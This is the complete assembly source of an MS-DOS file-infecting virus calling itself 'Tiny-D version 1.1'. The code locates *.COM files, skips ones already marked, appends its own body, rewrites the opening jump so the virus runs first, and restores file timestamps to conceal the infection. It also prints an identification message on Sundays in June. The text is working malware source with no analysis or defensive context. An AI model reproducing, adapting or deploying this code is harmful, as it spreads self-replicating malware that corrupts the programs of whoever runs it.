tinyv SEGMENT BYTE PUBLIC 'code' ASSUME CS:tinyv ASSUME SS:tinyv ASSUME DS:tinyv H00000 DB 0 H00001 DB 255 DUP(?) program PROC FAR ASSUME ES:tinyv begin: JMP pgstart ; start program exlbl LABEL BYTE db 0CDh, 20h, 7, 8, 9 pgstart: CALL tinyvir mnprg PROC NEAR tinyvir: POP SI ; get SI for storage SUB SI,offset tinyvir ; reset SI to virus start MOV BP,[SI+blnkdat] ; store SI in BP for return ADD BP,offset exlbl ; Add to get original offset LEA DX,[SI+fspec] ; get filespec (*.COM) SUB CX,CX ; || (clear regs) MOV AH,4EH ; || (find files) mainloop: ; \||/ INT 21H ; ----\/---- JC hiccup ; no more files found, terminate virus MOV DX,009EH ; set file name pointer MOV AX,3D02H ; open file INT 21H ; do it! MOV BX,AX ; move file handle to BX MOV AH,3FH ; read file LEA DX,[SI+endprog] ; load end of program (as buffer pntr) MOV DI,DX ; set Dest Index to area for buffer (?) MOV CX,0003H ; read 3 bytes INT 21H ; do it! CMP BYTE PTR [DI],0E9H ; check for JMP at start JE infect ; If begins w/JMP, Infect nextfile: MOV AH,4FH ; set int 21 to find next file JMP mainloop ; next file, do it! hiccup: JMP nofile infect: MOV AX,5700h ; get date function INT 21h ; do it! PUSH DX ; store date + time PUSH CX MOV DX,[DI+01H] ; set # of bytes to move MOV [SI+blnkdat],DX ; " " " " " " SUB CX,CX ; " " " " " " (0 here) MOV AX,4200H ; move file INT 21H ; do it! MOV DX,DI ; set dest index to area for buffer (?) MOV CX,0002H ; two bytes MOV AH,3FH ; read file INT 21H ; do it! CMP WORD PTR [DI],0807H ; check for infection JE nextfile ; next file if infected SUB DX,DX ; clear regs SUB CX,CX ; " " MOV AX,4202H ; move file pointer INT 21H ; do it! CMP DX,00H ; new pointer location 0? JNE nextfile ; if no then next file CMP AH,0FEH ; new pointer loc too high? JNC nextfile ; yes, try again MOV [SI+offset endprog+3],AX; point to data MOV AH,40H ; write instruction LEA DX,[SI+0105H] ; write buffer loc | MOV CX,offset endprog-105h ; (size of virus) --\|/-- INT 21H ; do it! JC exit ; error, bug out MOV AX,4200H ; move pointer SUB CX,CX ; clear reg MOV DX,OFFSET H00001 ; where to set pointer INT 21H ; do it! MOV AH,40H ; write to file LEA DX,[SI+offset endprog+3]; write data at SI+1AB MOV CX,0002H ; two bytes (the JMP) INT 21H ; do it! MOV AX,5701h ; store date POP CX ; restore time POP DX ; restore date INT 21h ; do it! exit: MOV AH,2Ah ; date function INT 21h ; do it! CMP AL,0h ; is it sunday? JNE closal ; nope, quit CMP DH,6h ; is it June? JNE closal ; nope, quit PUSH BX PUSH SI MOV AH,9h ; print string MOV DX, OFFSET nondata ; string to print ADD DX,SI INT 21h ; print it MOV DX, OFFSET nondat2 ; next string ADD DX, SI INT 21h ; print it! POP BX closal: MOV AH,3EH ; close file INT 21H ; do it! nofile: JMP BP ; go to original file mnprg ENDP program ENDP blnkdat LABEL WORD DW 0000H fspec LABEL WORD DB '*.COM' DB 0 nondata DB 'Tiny-D version 1.1$ '; Program identification nondat2 DB ' by ���@&��$' ; author identification endprog LABEL WORD tinyv ENDS END program